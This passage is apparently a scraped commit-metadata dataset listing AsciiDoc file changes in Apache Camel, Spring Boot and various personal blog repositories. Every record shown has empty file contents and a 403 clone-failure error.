,nicolaferraro\/camel,mgyongyosi\/camel,snurmine\/camel,tlehoux\/camel,curso007\/camel,jamesnetherton\/camel,gautric\/camel,isavin\/camel,mgyongyosi\/camel,chirino\/camel,nikhilvibhav\/camel,prashant2402\/camel,cunningt\/camel,lburgazzoli\/camel,acartapanis\/camel,gautric\/camel,w4tson\/camel,akhettar\/camel,acartapanis\/camel,acartapanis\/camel,rmarting\/camel,jonmcewen\/camel,jkorab\/camel,rmarting\/camel,jkorab\/camel,mcollovati\/camel,allancth\/camel,dmvolod\/camel,tdiesler\/camel,onders86\/camel,pmoerenhout\/camel,driseley\/camel,kevinearls\/camel,rmarting\/camel,tlehoux\/camel,tadayosi\/camel,gautric\/camel,pmoerenhout\/camel,chirino\/camel,ullgren\/camel,Fabryprog\/camel,ssharma\/camel,nboukhed\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,veithen\/camel,Thopap\/camel,veithen\/camel,chirino\/camel,snurmine\/camel,jkorab\/camel,onders86\/camel,w4tson\/camel,tdiesler\/camel,mgyongyosi\/camel,pkletsko\/camel,ssharma\/camel,pax95\/camel,dmvolod\/camel,pmoerenhout\/camel,allancth\/camel,NickCis\/camel,rmarting\/camel,mgyongyosi\/camel,ssharma\/camel,NickCis\/camel,gautric\/camel,prashant2402\/camel,RohanHart\/camel,lburgazzoli\/apache-camel,sverkera\/camel,curso007\/camel,veithen\/camel,adessaigne\/camel,snurmine\/camel,nicolaferraro\/camel,zregvart\/camel,nikhilvibhav\/camel,jamesnetherton\/camel,kevinearls\/camel,scranton\/camel,tlehoux\/camel,yuruki\/camel,isavin\/camel,pax95\/camel,alvinkwekel\/camel,acartapanis\/camel,yuruki\/camel,yuruki\/camel,driseley\/camel,anton-k11\/camel,DariusX\/camel,isavin\/camel,gautric\/camel,jkorab\/camel,davidkarlsen\/camel,anton-k11\/camel,anoordover\/camel,tdiesler\/camel,adessaigne\/camel,tadayosi\/camel,nboukhed\/camel,alvinkwekel\/camel,salikjan\/camel,allancth\/camel,lburgazzoli\/apache-camel,Fabryprog\/camel,punkhorn\/camel-upstream,nboukhed\/camel,NickCis\/camel,gnodet\/camel,lburgazzoli\/apache-camel,onders86\/camel,sverkera\/camel,nboukhed\/camel,tadayosi\/camel,christophd\/camel,pax95\/camel,pax95\/camel,lburgazzoli\/camel,tadayosi\/camel,scranton\/camel","old_file":"connectors\/camel-connector\/src\/main\/docs\/connector-component.adoc","new_file":"connectors\/camel-connector\/src\/main\/docs\/connector-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cb7651af2bdde5e81f7568e603712ef2ae5efdbf","subject":"Translation in progress","message":"Translation in progress\n","repos":"sardine\/spring-ref-ja","old_file":"src\/asciidoc\/web-mvc.adoc","new_file":"src\/asciidoc\/web-mvc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sardine\/spring-ref-ja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"389560adb8db112f0db0a9243986b19551b5ab65","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/issue_with_tests.adoc","new_file":"content\/writings\/issue_with_tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"0fd3b67f7994645dd1572adc7f54fe30074deebd","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-definition","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-definition.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f4bb9e3ba7106481c96cfbe03db6e10c45a68ea8","subject":"Polish doc","message":"Polish doc\n\nCloses gh-5404\n","repos":"NetoDevel\/spring-boot,sbcoba\/spring-boot,htynkn\/spring-boot,pvorb\/spring-boot,sebastiankirsch\/spring-boot,ollie314\/spring-boot,htynkn\/spring-boot,Nowheresly\/spring-boot,chrylis\/spring-boot,vakninr\/spring-boot,kdvolder\/spring-boot,tiarebalbi\/spring-boot,yangdd1205\/spring-boot,aahlenst\/spring-boot,zhanhb\/spring-boot,jbovet\/spring-boot,jxblum\/spring-boot,drumonii\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,jbovet\/spring-boot,wilkinsona\/spring-boot,akmaharshi\/jenkins,eddumelendez\/spring-boot,zhanhb\/spring-boot,kamilszymanski\/spring-boot,xiaoleiPENG\/my-project,afroje-reshma\/spring-boot-sample,scottfrederick\/spring-boot,rweisleder\/spring-boot,candrews\/spring-boot,hello2009chen\/spring-boot,shangyi0102\/spring-boot,linead\/spring-boot,wilkinsona\/spring-boot,tiarebalbi\/spring-boot,SaravananParthasarathy\/SPSDemo,joshiste\/spring-boot,pvorb\/spring-boot,mbogoevici\/spring-boot,deki\/spring-boot,ptahchiev\/spring-boot,candrews\/spring-boot,habuma\/spring-boot,philwebb\/spring-boot,jayarampradhan\/spring-boot,kamilszymanski\/spring-boot,donhuvy\/spring-boot,joshiste\/spring-boot,spring-projects\/spring-boot,vpavic\/spring-boot,jbovet\/spring-boot,michael-simons\/spring-boot,mbogoevici\/spring-boot,spring-projects\/spring-boot,SaravananParthasarathy\/SPSDemo,spring-projects\/spring-boot,dreis2211\/spring-boot,bjornlindstrom\/spring-boot,mbenson\/spring-boot,scottfrederick\/spring-boot,sebastiankirsch\/spring-boot,wilkinsona\/spring-boot,yangdd1205\/spring-boot,kamilszymanski\/spring-boot,vpavic\/spring-boot,DeezCashews\/spring-boot,mbenson\/spring-boot,rweisleder\/spring-boot,javyzheng\/spring-boot,Nowheresly\/spring-boot,deki\/spring-boot,sbcoba\/spring-boot,zhanhb\/spring-boot,joshthornhill\/spring-boot,isopov\/spring-boot,donhuvy\/spring-boot,hello2009chen\/spring-boot,vakninr\/spring-boot,ihoneymon\/spring-boot,candrews\/spring-boot,bijukunjummen\/spring-boot,joshthornhill\/spring-boot,lucassaldanha\/spring-boot,bijukunjummen\/spring-boot,jayarampradhan\/spring-boot,felipeg48\/spring-boot,RichardCSantana\/spring-boot,yhj630520\/spring-boot,jxblum\/spring-boot,nebhale\/spring-boot,Buzzardo\/spring-boot,DeezCashews\/spring-boot,Buzzardo\/spring-boot,NetoDevel\/spring-boot,lexandro\/spring-boot,lburgazzoli\/spring-boot,spring-projects\/spring-boot,candrews\/spring-boot,vakninr\/spring-boot,felipeg48\/spring-boot,philwebb\/spring-boot,zhanhb\/spring-boot,hqrt\/jenkins2-course-spring-boot,bijukunjummen\/spring-boot,bclozel\/spring-boot,royclarkson\/spring-boot,shangyi0102\/spring-boot,michael-simons\/spring-boot,jbovet\/spring-boot,bclozel\/spring-boot,hqrt\/jenkins2-course-spring-boot,shakuzen\/spring-boot,herau\/spring-boot,dreis2211\/spring-boot,akmaharshi\/jenkins,isopov\/spring-boot,brettwooldridge\/spring-boot,sebastiankirsch\/spring-boot,RichardCSantana\/spring-boot,kdvolder\/spring-boot,spring-projects\/spring-boot,vpavic\/spring-boot,tiarebalbi\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,vpavic\/spring-boot,herau\/spring-boot,akmaharshi\/jenkins,olivergierke\/spring-boot,tsachev\/spring-boot,ilayaperumalg\/spring-boot,minmay\/spring-boot,jvz\/spring-boot,scottfrederick\/spring-boot,lenicliu\/spring-boot,habuma\/spring-boot,yhj630520\/spring-boot,akmaharshi\/jenkins,wilkinsona\/spring-boot,cleverjava\/jenkins2-course-spring-boot,olivergierke\/spring-boot,habuma\/spring-boot,joshthornhill\/spring-boot,cleverjava\/jenkins2-course-spring-boot,herau\/spring-boot,qerub\/spring-boot,joshiste\/spring-boot,linead\/spring-boot,kdvolder\/spring-boot,xiaoleiPENG\/my-project,ilayaperumalg\/spring-boot,bjornlindstrom\/spring-boot,NetoDevel\/spring-boot,shangyi0102\/spring-boot,joshiste\/spring-boot,jvz\/spring-boot,deki\/spring-boot,jmnarloch\/spring-boot,dreis2211\/spring-boot,sbcoba\/spring-boot,izeye\/spring-boot,brettwooldridge\/spring-boot,lenicliu\/spring-boot,ptahchiev\/spring-boot,tsachev\/spring-boot,izeye\/spring-boot,bijukunjummen\/spring-boot,lenicliu\/spring-boot,olivergierke\/spring-boot,DeezCashews\/spring-boot,kdvolder\/spring-boot,royclarkson\/spring-boot,tsachev\/spring-boot,zhanhb\/spring-boot,sbcoba\/spring-boot,aahlenst\/spring-boot,scottfrederick\/spring-boot,izeye\/spring-boot,eddumelendez\/spring-boot,bclozel\/spring-boot,philwebb\/spring-boot-concourse,chrylis\/spring-boot,lexandro\/spring-boot,izeye\/spring-boot,felipeg48\/spring-boot,ilayaperumalg\/spring-boot,mbogoevici\/spring-boot,joshthornhill\/spring-boot,royclarkson\/spring-boot,isopov\/spring-boot,ihoneymon\/spring-boot,aahlenst\/spring-boot,thomasdarimont\/spring-boot,bbrouwer\/spring-boot,sebastiankirsch\/spring-boot,herau\/spring-boot,aahlenst\/spring-boot,drumonii\/spring-boot,bclozel\/spring-boot,bjornlindstrom\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,bbrouwer\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,thomasdarimont\/spring-boot,jxblum\/spring-boot,rweisleder\/spring-boot,javyzheng\/spring-boot,joshiste\/spring-boot,kdvolder\/spring-boot,mbogoevici\/spring-boot,mosoft521\/spring-boot,habuma\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,spring-projects\/spring-boot,chrylis\/spring-boot,lexandro\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,shakuzen\/spring-boot,dreis2211\/spring-boot,mdeinum\/spring-boot,eddumelendez\/spring-boot,jayarampradhan\/spring-boot,rweisleder\/spring-boot,ilayaperumalg\/spring-boot,dreis2211\/spring-boot,eddumelendez\/spring-boot,lexandro\/spring-boot,vpavic\/spring-boot,drumonii\/spring-boot,wilkinsona\/spring-boot,michael-simons\/spring-boot,brettwooldridge\/spring-boot,linead\/spring-boot,shakuzen\/spring-boot,philwebb\/spring-boot-concourse,Buzzardo\/spring-boot,thomasdarimont\/spring-boot,hello2009chen\/spring-boot,philwebb\/spring-boot,wilkinsona\/spring-boot,ilayaperumalg\/spring-boot,cleverjava\/jenkins2-course-spring-boot,philwebb\/spring-boot-concourse,ilayaperumalg\/spring-boot,herau\/spring-boot,lburgazzoli\/spring-boot,htynkn\/spring-boot,Buzzardo\/spring-boot,drumonii\/spring-boot,yhj630520\/spring-boot,jbovet\/spring-boot,SaravananParthasarathy\/SPSDemo,michael-simons\/spring-boot,tsachev\/spring-boot,hello2009chen\/spring-boot,habuma\/spring-boot,nebhale\/spring-boot,kamilszymanski\/spring-boot,isopov\/spring-boot,Buzzardo\/spring-boot,aahlenst\/spring-boot,lucassaldanha\/spring-boot,jvz\/spring-boot,shakuzen\/spring-boot,hello2009chen\/spring-boot,jayarampradhan\/spring-boot,michael-simons\/spring-boot,i007422\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,philwebb\/spring-boot,qerub\/spring-boot,donhuvy\/spring-boot,javyzheng\/spring-boot,lburgazzoli\/spring-boot,afroje-reshma\/spring-boot-sample,lenicliu\/spring-boot,minmay\/spring-boot,jvz\/spring-boot,rweisleder\/spring-boot,vpavic\/spring-boot,bclozel\/spring-boot,tsachev\/spring-boot,deki\/spring-boot,jxblum\/spring-boot,philwebb\/spring-boot,zhanhb\/spring-boot,i007422\/jenkins2-course-spring-boot,bbrouwer\/spring-boot,xiaoleiPENG\/my-project,candrews\/spring-boot,yangdd1205\/spring-boot,olivergierke\/spring-boot,yhj630520\/spring-boot,mbenson\/spring-boot,thomasdarimont\/spring-boot,ollie314\/spring-boot,chrylis\/spring-boot,mbogoevici\/spring-boot,donhuvy\/spring-boot,eddumelendez\/spring-boot,minmay\/spring-boot,hqrt\/jenkins2-course-spring-boot,linead\/spring-boot,mosoft521\/spring-boot,shakuzen\/spring-boot,olivergierke\/spring-boot,chrylis\/spring-boot,yhj630520\/spring-boot,afroje-reshma\/spring-boot-sample,htynkn\/spring-boot,mdeinum\/spring-boot,ollie314\/spring-boot,RichardCSantana\/spring-boot,minmay\/spring-boot,Nowheresly\/spring-boot,DeezCashews\/spring-boot,SaravananParthasarathy\/SPSDemo,ihoneymon\/spring-boot,lburgazzoli\/spring-boot,cleverjava\/jenkins2-course-spring-boot,drumonii\/spring-boot,mosoft521\/spring-boot,ptahchiev\/spring-boot,royclarkson\/spring-boot,joshthornhill\/spring-boot,NetoDevel\/spring-boot,jxblum\/spring-boot,kamilszymanski\/spring-boot,RichardCSantana\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,chrylis\/spring-boot,xiaoleiPENG\/my-project,lexandro\/spring-boot,jayarampradhan\/spring-boot,htynkn\/spring-boot,afroje-reshma\/spring-boot-sample,NetoDevel\/spring-boot,DeezCashews\/spring-boot,SaravananParthasarathy\/SPSDemo,felipeg48\/spring-boot,pvorb\/spring-boot,ihoneymon\/spring-boot,tiarebalbi\/spring-boot,sebastiankirsch\/spring-boot,qerub\/spring-boot,htynkn\/spring-boot,ptahchiev\/spring-boot,vakninr\/spring-boot,lburgazzoli\/spring-boot,mbenson\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,bbrouwer\/spring-boot,ollie314\/spring-boot,mbenson\/spring-boot,jmnarloch\/spring-boot,philwebb\/spring-boot-concourse,isopov\/spring-boot,tiarebalbi\/spring-boot,rweisleder\/spring-boot,royclarkson\/spring-boot,drumonii\/spring-boot,scottfrederick\/spring-boot,javyzheng\/spring-boot,cleverjava\/jenkins2-course-spring-boot,jmnarloch\/spring-boot,bijukunjummen\/spring-boot,Nowheresly\/spring-boot,pvorb\/spring-boot,sbcoba\/spring-boot,i007422\/jenkins2-course-spring-boot,philwebb\/spring-boot,mosoft521\/spring-boot,tiarebalbi\/spring-boot,lucassaldanha\/spring-boot,habuma\/spring-boot,qerub\/spring-boot,scottfrederick\/spring-boot,ptahchiev\/spring-boot,vakninr\/spring-boot,hqrt\/jenkins2-course-spring-boot,michael-simons\/spring-boot,jmnarloch\/spring-boot,ihoneymon\/spring-boot,tsachev\/spring-boot,shangyi0102\/spring-boot,akmaharshi\/jenkins,brettwooldridge\/spring-boot,deki\/spring-boot,lucassaldanha\/spring-boot,philwebb\/spring-boot-concourse,dreis2211\/spring-boot,felipeg48\/spring-boot,kdvolder\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,mevasaroj\/jenkins2-course-spring-boot,shangyi0102\/spring-boot,linead\/spring-boot,lenicliu\/spring-boot,nebhale\/spring-boot,afroje-reshma\/spring-boot-sample,shakuzen\/spring-boot,izeye\/spring-boot,nebhale\/spring-boot,mosoft521\/spring-boot,mbenson\/spring-boot,ptahchiev\/spring-boot,donhuvy\/spring-boot,xiaoleiPENG\/my-project,mdeinum\/spring-boot,bclozel\/spring-boot,ollie314\/spring-boot,qerub\/spring-boot,ihoneymon\/spring-boot,lucassaldanha\/spring-boot,javyzheng\/spring-boot,joshiste\/spring-boot,felipeg48\/spring-boot,jxblum\/spring-boot,bjornlindstrom\/spring-boot,aahlenst\/spring-boot,brettwooldridge\/spring-boot,Nowheresly\/spring-boot,donhuvy\/spring-boot,hqrt\/jenkins2-course-spring-boot,bjornlindstrom\/spring-boot,jvz\/spring-boot,pvorb\/spring-boot,i007422\/jenkins2-course-spring-boot,mdeinum\/spring-boot,RichardCSantana\/spring-boot,mdeinum\/spring-boot,isopov\/spring-boot,Buzzardo\/spring-boot,eddumelendez\/spring-boot,minmay\/spring-boot,bbrouwer\/spring-boot,thomasdarimont\/spring-boot,jmnarloch\/spring-boot,nebhale\/spring-boot,mdeinum\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"710870f43518733909040d57715fa29200a4e743","subject":"Update 2016-06-10-A-W-S-W-A-F-Certificate-Manager-Cloud-Front.adoc","message":"Update 2016-06-10-A-W-S-W-A-F-Certificate-Manager-Cloud-Front.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-A-W-S-W-A-F-Certificate-Manager-Cloud-Front.adoc","new_file":"_posts\/2016-06-10-A-W-S-W-A-F-Certificate-Manager-Cloud-Front.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98664b04b495ab9b802127a2c420df4f7431b125","subject":"Publish 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","message":"Publish 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","new_file":"17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marchelo2212\/marchelo2212.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18b9dd552d03b143946a1e5b370104c75be0b001","subject":"Update 2016-03-29-Zonas-de-transferencia.adoc","message":"Update 2016-03-29-Zonas-de-transferencia.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Zonas-de-transferencia.adoc","new_file":"_posts\/2016-03-29-Zonas-de-transferencia.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8632498bfcbaa669f49713bfca19541aed09cf2","subject":"y2b create post The Invisible iPhone Button...","message":"y2b create post The Invisible iPhone Button...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-27-TheInvisibleiPhoneButton.adoc","new_file":"_posts\/2017-11-27-TheInvisibleiPhoneButton.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d72768d489ddf7c17ca856d145f800cda509cd18","subject":"y2b create post NVIDIA Project Shield: My Thoughts (CES 2013)","message":"y2b create post NVIDIA Project Shield: My Thoughts (CES 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-15-NVIDIA-Project-Shield-My-Thoughts-CES-2013.adoc","new_file":"_posts\/2013-01-15-NVIDIA-Project-Shield-My-Thoughts-CES-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f8d080289549f106dfa02d94302581b119e6ca5","subject":"Update 2019-01-31-Indoor-Skareparks-for-dorsethampshire-area.adoc","message":"Update 2019-01-31-Indoor-Skareparks-for-dorsethampshire-area.adoc","repos":"joelcbailey\/joelcbailey.github.io,joelcbailey\/joelcbailey.github.io,joelcbailey\/joelcbailey.github.io,joelcbailey\/joelcbailey.github.io","old_file":"_posts\/2019-01-31-Indoor-Skareparks-for-dorsethampshire-area.adoc","new_file":"_posts\/2019-01-31-Indoor-Skareparks-for-dorsethampshire-area.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joelcbailey\/joelcbailey.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67422ae93faf807a56bab516385959c338ab43fe","subject":"Update 2017-07-20-Learned-Primal-Dual-reconstruction.adoc","message":"Update 2017-07-20-Learned-Primal-Dual-reconstruction.adoc","repos":"adler-j\/adler-j.github.io,adler-j\/adler-j.github.io","old_file":"_posts\/2017-07-20-Learned-Primal-Dual-reconstruction.adoc","new_file":"_posts\/2017-07-20-Learned-Primal-Dual-reconstruction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adler-j\/adler-j.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b773d1c540416d8e8e5ee13fbdf0d101c8772d5c","subject":"Update static\/vendors\/ace-builds\/demo\/kitchen-sink\/docs\/asciidoc.asciidoc","message":"Update static\/vendors\/ace-builds\/demo\/kitchen-sink\/docs\/asciidoc.asciidoc\n\nSigned-off-by: Bernard Ojengwa <fccb4cc00c1ba7e51bf5c2b5f77130b9fe8d917e@gmail.com>\n","repos":"apipanda\/openssl,apipanda\/openssl,apipanda\/openssl,apipanda\/openssl","old_file":"static\/vendors\/ace-builds\/demo\/kitchen-sink\/docs\/asciidoc.asciidoc","new_file":"static\/vendors\/ace-builds\/demo\/kitchen-sink\/docs\/asciidoc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apipanda\/openssl.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07ea69ce4df7f47b2c7b3f8ecc87ca524255f6e4","subject":"Update 2016-12-30-Kleptography-in-RSA.adoc","message":"Update 2016-12-30-Kleptography-in-RSA.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7042d7ae8a77e0fcd19405f4e99c125e58a5f1a3","subject":"CAMEL-10843 - very initial, checking it in considering better than nothing","message":"CAMEL-10843 - very initial, checking it in considering better than nothing\n","repos":"pkletsko\/camel,yuruki\/camel,gnodet\/camel,prashant2402\/camel,anoordover\/camel,sverkera\/camel,onders86\/camel,sverkera\/camel,Thopap\/camel,CodeSmell\/camel,scranton\/camel,jamesnetherton\/camel,isavin\/camel,nicolaferraro\/camel,mgyongyosi\/camel,gnodet\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,rmarting\/camel,alvinkwekel\/camel,Thopap\/camel,rmarting\/camel,tadayosi\/camel,anoordover\/camel,tdiesler\/camel,zregvart\/camel,sverkera\/camel,mcollovati\/camel,Thopap\/camel,anoordover\/camel,drsquidop\/camel,anoordover\/camel,punkhorn\/camel-upstream,gautric\/camel,davidkarlsen\/camel,tlehoux\/camel,DariusX\/camel,christophd\/camel,anoordover\/camel,pmoerenhout\/camel,pmoerenhout\/camel,scranton\/camel,acartapanis\/camel,jonmcewen\/camel,apache\/camel,curso007\/camel,isavin\/camel,anton-k11\/camel,snurmine\/camel,scranton\/camel,akhettar\/camel,cunningt\/camel,onders86\/camel,mcollovati\/camel,gnodet\/camel,objectiser\/camel,CodeSmell\/camel,dmvolod\/camel,Fabryprog\/camel,isavin\/camel,apache\/camel,yuruki\/camel,pax95\/camel,adessaigne\/camel,zregvart\/camel,Thopap\/camel,jamesnetherton\/camel,anton-k11\/camel,kevinearls\/camel,curso007\/camel,curso007\/camel,drsquidop\/camel,punkhorn\/camel-upstream,jamesnetherton\/camel,onders86\/camel,yuruki\/camel,mgyongyosi\/camel,tlehoux\/camel,adessaigne\/camel,Fabryprog\/camel,isavin\/camel,jonmcewen\/camel,pkletsko\/camel,jonmcewen\/camel,drsquidop\/camel,acartapanis\/camel,curso007\/camel,tadayosi\/camel,cunningt\/camel,alvinkwekel\/camel,pmoerenhout\/camel,christophd\/camel,objectiser\/camel,christophd\/camel,scranton\/camel,mcollovati\/camel,pax95\/camel,ullgren\/camel,rmarting\/camel,dmvolod\/camel,dmvolod\/camel,anton-k11\/camel,anton-k11\/camel,kevinearls\/camel,cunningt\/camel,jonmcewen\/camel,snurmine\/camel,scranton\/camel,adessaigne\/camel,pax95\/camel,akhettar\/camel,tlehoux\/camel,tdiesler\/camel,ullgren\/camel,anoordover\/camel,apache\/camel,DariusX\/camel,gautric\/camel,kevinearls\/camel,jonmcewen\/camel,isavin\/camel,sverkera\/camel,tlehoux\/camel,apache\/camel,pkletsko\/camel,cunningt\/camel,Thopap\/camel,pmoerenhout\/camel,onders86\/camel,tdiesler\/camel,drsquidop\/camel,mgyongyosi\/camel,pkletsko\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,tdiesler\/camel,acartapanis\/camel,tadayosi\/camel,kevinearls\/camel,jamesnetherton\/camel,christophd\/camel,acartapanis\/camel,Fabryprog\/camel,adessaigne\/camel,jamesnetherton\/camel,akhettar\/camel,tlehoux\/camel,tadayosi\/camel,pmoerenhout\/camel,alvinkwekel\/camel,snurmine\/camel,nboukhed\/camel,rmarting\/camel,prashant2402\/camel,mgyongyosi\/camel,kevinearls\/camel,prashant2402\/camel,yuruki\/camel,nboukhed\/camel,salikjan\/camel,snurmine\/camel,cunningt\/camel,punkhorn\/camel-upstream,gautric\/camel,cunningt\/camel,zregvart\/camel,onders86\/camel,gautric\/camel,alvinkwekel\/camel,gnodet\/camel,davidkarlsen\/camel,dmvolod\/camel,jamesnetherton\/camel,nboukhed\/camel,prashant2402\/camel,akhettar\/camel,snurmine\/camel,ullgren\/camel,DariusX\/camel,christophd\/camel,drsquidop\/camel,yuruki\/camel,objectiser\/camel,anton-k11\/camel,tdiesler\/camel,nikhilvibhav\/camel,gnodet\/camel,kevinearls\/camel,mcollovati\/camel,gautric\/camel,snurmine\/camel,davidkarlsen\/camel,curso007\/camel,rmarting\/camel,ullgren\/camel,gautric\/camel,apache\/camel,objectiser\/camel,CodeSmell\/camel,pax95\/camel,prashant2402\/camel,DariusX\/camel,akhettar\/camel,curso007\/camel,salikjan\/camel,nicolaferraro\/camel,sverkera\/camel,drsquidop\/camel,tdiesler\/camel,adessaigne\/camel,Fabryprog\/camel,pkletsko\/camel,akhettar\/camel,onders86\/camel,dmvolod\/camel,apache\/camel,pkletsko\/camel,prashant2402\/camel,dmvolod\/camel,nboukhed\/camel,adessaigne\/camel,rmarting\/camel,isavin\/camel,nboukhed\/camel,sverkera\/camel,nboukhed\/camel,nicolaferraro\/camel,mgyongyosi\/camel,tadayosi\/camel,Thopap\/camel,zregvart\/camel,tlehoux\/camel,yuruki\/camel,pax95\/camel,christophd\/camel,mgyongyosi\/camel,nikhilvibhav\/camel,scranton\/camel,davidkarlsen\/camel,pmoerenhout\/camel,acartapanis\/camel,jonmcewen\/camel,pax95\/camel,CodeSmell\/camel,tadayosi\/camel,acartapanis\/camel,anton-k11\/camel","old_file":"components\/camel-ribbon\/src\/main\/docs\/ribbon-component.adoc","new_file":"components\/camel-ribbon\/src\/main\/docs\/ribbon-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pkletsko\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4485c8ea7774d93c968a26f94096216666b5924a","subject":"Added book.adoc default file","message":"Added book.adoc default file\n","repos":"vladmihalcea\/unfolding-java-transactions,wgpshashank\/unfolding-java-transactions,vladmihalcea\/unfolding-java-transactions,wgpshashank\/unfolding-java-transactions","old_file":"book.adoc","new_file":"book.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wgpshashank\/unfolding-java-transactions.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ad8cbe994b5683ad686d3279ea4990f5787eece6","subject":"Update 2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","message":"Update 2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","repos":"AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog","old_file":"_posts\/2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","new_file":"_posts\/2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexL777\/hubpressblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37ad1f1e89f1b60d13e09345c273dbfaa052e050","subject":"Initial commit","message":"Initial 